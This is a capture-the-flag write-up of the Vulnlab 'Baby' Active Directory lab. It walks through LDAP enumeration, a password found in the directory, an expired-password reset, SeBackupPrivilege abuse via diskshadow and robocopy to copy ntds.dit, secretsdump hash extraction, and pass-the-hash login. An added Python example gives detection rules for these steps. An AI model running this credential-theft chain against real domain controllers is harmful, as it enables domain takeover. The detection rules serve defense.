Baby - Vulnlab

Enumeration

Let's start by enumerating all TCP ports with nmap.
nmap -sCV -p- --min-rate 1000 -v 10.10.74.147 -Pn
I have LDAP (port 3268) and RPC (port 49667).

Let's add the domain and the DC hostname to /etc/hosts.
echo '10.10.74.147 baby.vl' | sudo tee -a /etc/hosts
echo '10.10.74.147 BabyDC.baby.vl' | sudo tee -a /etc/hosts

Let's enumerate UDP ports as well.
sudo nmap -Pn -n 10.10.74.147 -sU --top-ports=100
I have DNS (port 53), Kerberos (port 88) and NTP (port 123).

LDAP - port 3268

Let's enumerate users on the LDAP server with the windapsearch.py script.
python /root/windapsearch/windapsearch.py -d baby.vl --dc-ip 10.10.74.147 -U
I got a lot of usernames, so let's save them to a text file.
python /root/windapsearch/windapsearch.py -d baby.vl --dc-ip 10.10.74.147 -U | grep '@' | cut -d ' ' -f 2 | cut -d '@' -f 1 | uniq > users.txt
cat users.txt
Since there are some usernames, let's see whether passwords are stored in the directory as well.
python /root/windapsearch/windapsearch.py -d baby.vl --dc-ip 10.10.74.147 -U --full | grep Password
No password was found, so let's try a different approach and look at the full output without a filter.
python /root/windapsearch/windapsearch.py -d baby.vl --dc-ip 10.10.74.147 -U --full
Now I have the credentials Teresa.Bell:BabyStart123!, so let's check for WinRM access with this password.
crackmapexec winrm 10.10.74.147 -u users.txt -p 'BabyStart123!' -d BabyDC.baby.vl
Since that doesn't work, I tried SMB access as well, which didn't work either, so let's use ldapsearch to look for more details.
ldapsearch -x -H ldap://10.10.74.147 -D '' -w '' -b "DC=baby,DC=vl"
I saw a different username, Caroline.Robinson, which I will add to users.txt before running crackmapexec again.
crackmapexec smb 10.10.74.147 -u users.txt -p 'BabyStart123!' -d BabyDC.baby.vl

STATUS_PASSWORD_MUST_CHANGE - SMB - smbpasswd

It seems we have a user whose password must be changed before the account can be used, so let's change it with the smbpasswd tool.
smbpasswd -U Caroline.Robinson -r 10.10.74.147
BabyStart123!        (old password)
BabyStart123!123!    (new password; smbpasswd asks for it twice)
Let's check whether I have access using crackmapexec once again.
crackmapexec winrm 10.10.74.147 -u Caroline.Robinson -p 'BabyStart123!123!' -d BabyDC.baby.vl
It worked! So let's log in using evil-winrm.
evil-winrm -i BabyDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!123!'

Privilege Escalation

Let's get the user flag.
cd ..
cd Desktop
dir

User Privileges - SeBackupPrivilege

whoami /priv
Since we have SeBackupPrivilege, which lets a process read any file for backup purposes regardless of its ACL, let's abuse it with robocopy in backup mode (/b) to copy files from the Administrator's Desktop.
robocopy /b C:\Users\Administrator\Desktop\ C:\
Checking C:\ shows that I now have the Administrator's files, including the root flag.
dir

SAM & SYSTEM file - uwu.dsh & secretsdump

I found on this link a method to recover the SAM and ntds files by creating a .dsh file.
First, on the target, save the SYSTEM hive (needed later to decrypt the contents of ntds.dit):
reg save hklm\system c:\Temp\system
On the attacking machine, create the diskshadow script:
nano uwu.dsh

set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:

Convert it to Windows (CRLF) line endings, then upload it through evil-winrm and run it on the target:
unix2dos uwu.dsh
cd C:\Windows\Temp
upload uwu.dsh
diskshadow /s uwu.dsh
With the shadow copy exposed as z:, copy ntds.dit out of it using backup mode, then download both files:
robocopy /b z:\windows\ntds . ntds.dit
download ntds.dit
download system
Extract the hashes offline with secretsdump:
impacket-secretsdump -ntds ntds.dit -system system local
Finally, use the Administrator NT hash to log in with evil-winrm:
evil-winrm -i 10.10.74.147 -u administrator -H "ee4457ae59f1e3fbd764e33d9cef123d"
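Every step of this section leaves a process-creation trail on the DC (reg save of a hive, diskshadow run with a script file, robocopy in backup mode against the NTDS folder of a shadow volume), which is what a defender should alert on. The Python below is an added example, not part of the original writeup: it runs simple rules over constructed process-creation events (account names mirror this lab, the records themselves are made up, and svc_backup is a hypothetical account) and correlates hits per account, assuming the events have already been parsed into dicts with user, image and cmdline fields.

```python
import re

# Constructed process-creation events (Windows 4688 / Sysmon event 1 style), reduced to the
# fields the rules need. Not captured from the lab; account names only mirror this writeup.
SAMPLE_EVENTS = [
    {"user": "BABY\\Caroline.Robinson", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg save hklm\\system c:\\Temp\\system"},
    {"user": "BABY\\Caroline.Robinson", "image": "C:\\Windows\\System32\\diskshadow.exe",
     "cmdline": "diskshadow /s uwu.dsh"},
    {"user": "BABY\\Caroline.Robinson", "image": "C:\\Windows\\System32\\robocopy.exe",
     "cmdline": "robocopy /b z:\\windows\\ntds . ntds.dit"},
    {"user": "BABY\\svc_backup", "image": "C:\\Windows\\System32\\robocopy.exe",   # hypothetical account
     "cmdline": "robocopy /b C:\\Users\\Administrator\\Desktop\\ C:\\"},
    {"user": "BABY\\Teresa.Bell", "image": "C:\\Windows\\System32\\robocopy.exe",  # benign copy, no /b
     "cmdline": "robocopy C:\\Share\\docs D:\\Backup\\docs /e"},
]

# Each rule is one stage of the SeBackupPrivilege -> shadow copy -> ntds.dit chain shown above.
RULES = [
    ("reg_save_hive", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I)),
    ("robocopy_backup_mode", re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b", re.I)),
    ("ntds_dit_access", re.compile(r"\\ntds\b", re.I)),
]


def match_rules(event):
    """Names of every rule whose pattern matches this event's command line."""
    return [name for name, pattern in RULES if pattern.search(event["cmdline"])]


def correlate(events):
    """Group rule hits by account: {user: sorted list of distinct rule names}."""
    hits = {}
    for event in events:
        names = match_rules(event)
        if names:
            hits.setdefault(event["user"], set()).update(names)
    return {user: sorted(names) for user, names in hits.items()}


def severity(rule_names):
    """Two or more distinct stages from one account look like the full chain: high."""
    return "high" if len(rule_names) >= 2 else "medium"


if __name__ == "__main__":
    for user, names in correlate(SAMPLE_EVENTS).items():
        print(f"{severity(names):6} {user}: {', '.join(names)}")
```

A single robocopy /b hit can be legitimate backup activity, which is why the per-account correlation, not the individual rule, decides the severity.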